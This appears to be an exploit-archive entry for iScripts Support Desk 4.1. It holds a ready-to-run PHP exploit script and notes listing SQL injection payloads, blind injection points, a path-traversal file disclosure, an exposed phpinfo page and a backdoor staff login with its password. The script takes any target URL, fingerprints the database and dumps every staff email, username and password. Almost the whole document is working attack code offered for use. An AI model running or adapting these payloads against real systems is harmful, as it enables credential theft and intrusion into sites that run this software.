iScripts Support Desk 4.1 SQL Injection



EKU-ID: 3722 CVE: OSVDB-ID:
Author: i-Hmx Published: 2013-12-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<?
/*
[+] iScripts Support desk version 4.1
[+] Sql Injection Exploit
[+] Vuln & Exploit By i-Hmx
[+] sec4ever.com , 1337s.cc

I.Sql Injection vulns

> Normal Sql
 postticketbeforeregistersave.php
Staff table
 post : txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from `information_schema`.tables where table_schema=database() limit 33,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN
Get staff
 Post : txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(sptbl_staffs.vMail as char))),0x5e,unhex(Hex(cast(sptbl_staffs.vLogin as char))),0x5e,unhex(Hex(cast(sptbl_staffs.vPassword as char))),0x27,0x7e) from sptbl_staffs limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN

 > Blind
/onlinetest.php

 $comp = $_GET["comp"];
 include("./config/settings.php");
 include("./includes/functions/dbfunctions.php");
 $conn = getConnection();
 $sql_img = "select  vChatIcon from sptbl_companies where nCompId='".$comp."'";
 $res_img = executeSelect($sql_img,$conn);
 if ( mysql_num_rows($res_img) > 0 ) {
Exploit : /onlinetest.php?id=1


/client_prechat.php
Line 3 : if ($_POST["comp"] !='' ) $comp = $_POST["comp"];
Line 245 : 
   $sql_dpt = "SELECT d.nDeptId, d.vDeptDesc FROM sptbl_depts d INNER JOIN sptbl_companies c  
   			   ON ( d.nCompId = c.nCompId ) WHERE d.nCompId = '".$comp."' ORDER BY d.vDeptDesc";
   $res_dpt = executeSelect($sql_dpt,$conn);

Exploit as : site.com/supportdesk/client_prechat.php
Post parameter : comp=%inject_here%

/getChatIcon_det.php
Line 2 :  $comp = $_GET["comp"];
Line 39 :  
$sql = "select s.nStaffId from sptbl_staffs s inner join sptbl_staffdept sd on ( s.nStaffId = sd.nStaffId )  inner join sptbl_depts d on ( sd.nDeptId = d.nDeptId )  where s.vOnline='1' and s.vDelStatus='0' and d.nCompId='".$comp."'";
 $result = executeSelect($sql,$conn);
 if ( mysql_num_rows($result) > 0 ) {
   $img_src = "images/chat/chat-icon-".$img_id."-online.gif";
 } else {
   $img_src = "images/chat/chat-icon-".$img_id."-offline.gif";
 }

Exploit as : site.com/supportdesk/getChatIcon_det.php?comp=1


/getChatUpdates.php
if ( $_SESSION['sess_userid'] == "" ) echo "##X";
   //So to Exploit it u should be logged in as normal user
   else {
   $mod = isset( $_GET['mod']) ? $_GET['mod'] : ''  ;
   $chatid = isset( $_GET['chatid']) ? $_GET['chatid'] : ''  ;
   $conn = getConnection();
     $sql = "Select tMatter from sptbl_chat where nChatId='".$chatid."'";
	 $result = executeSelect($sql,$conn);
     $rowcnt_chatUpd = mysql_num_rows($result);
Exploit : Login then Inject here > site.com/supportdesk/getChatUpdates.php?comp=1
You'd better use ur session id at havij for injection

II.Local File Disclosure

admin/csvdownload.php
  $filename="../csvfiles/".addslashes($_GET["id"]);
  header('Content-Description: File Transfer'); 
  header('Content-Type: application/force-download'); 
  header('Content-Length: ' . filesize($filename)); 
  header('Content-Disposition: attachment; filename=' . basename($filename)); 
  readfile($filename);

Exploit as : admin/csvdownload.php?id=../config/settings.php

III.PHP Info disclosure
/phpinfo.php

IV.Back Door user
don't know if the nulled version only is backdoored or all versions
but backdoor staff member is installed as
user : staff
pass : staff


*/
if(!$argv[1])
{
echo "\n[+] usage : php ".$argv[0]." [Target]\nex : php ".$argv[0]." http://site.com/support/\n"; 
exit();
}
echo "[+] iScripts Support Desk Sql Injection Exploit \n";
echo "[-] Exploited By i-Hmx \n";
echo "[-] sec4ever.com , 1337s.cc\n";
function kastr($string, $start, $end){
		$string = " ".$string;
		$ini = strpos($string,$start);
		if ($ini == 0) return "";
		$ini += strlen($start);
		$len = strpos($string,$end,$ini) - $ini;
		return substr($string,$ini,$len);
}
function faexploit($url,$inj){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url."postticketbeforeregistersave.php");
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl, CURLOPT_POSTFIELDS,$inj);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
$version=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select concat(0x66617273617779,0x3e3e,unhex(Hex(cast(version() as char))),0x3c3c)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN");
if(preg_match("/farsawy/",$version))
{
$ver=kastr($version,">>","<<");
echo "[-] Mysql Version : $ver\n";
 $tbl=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select distinct concat(0x3e3e,unhex(Hex(cast(table_name as char))),0x3c3c) from `information_schema`.tables where table_schema=database() limit 33,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN");
 $stf=kastr($tbl,">>","<<");
 echo "[-] Staffs table name : $stf\n";
 $numb=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x3e3e,count(*),0x3c3c) from sptbl_staffs)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN");
 $num=kastr($numb,">>","<<");
 echo "[-] Number of staff members : $num\n";
 echo "[-] Staffs data ordered as : Email   :   Username:   Password\n";
 for($f=0;$f<$num;$f++)
  {
  $data=faexploit($argv[1],"txtname=faris&txtemail=fa@1337s.cc&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x3e3e,unhex(Hex(cast(vMail as char))),0x3a,unhex(Hex(cast(vLogin as char))),0x3a,unhex(Hex(cast(vPassword as char))),0x3c3c) from $stf limit $f,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN");
  $ok=kastr($data,">>","<<");
  echo "    $ok\n";
  }
 echo "[+] Done\n";
 exit("                               Greets From Faris ;)");
 }

else
{
echo "[-] Target Not vulnerable\n";
echo "[+] Exit\n";
exit();
}
// 07/2011
// i-Hmx
?>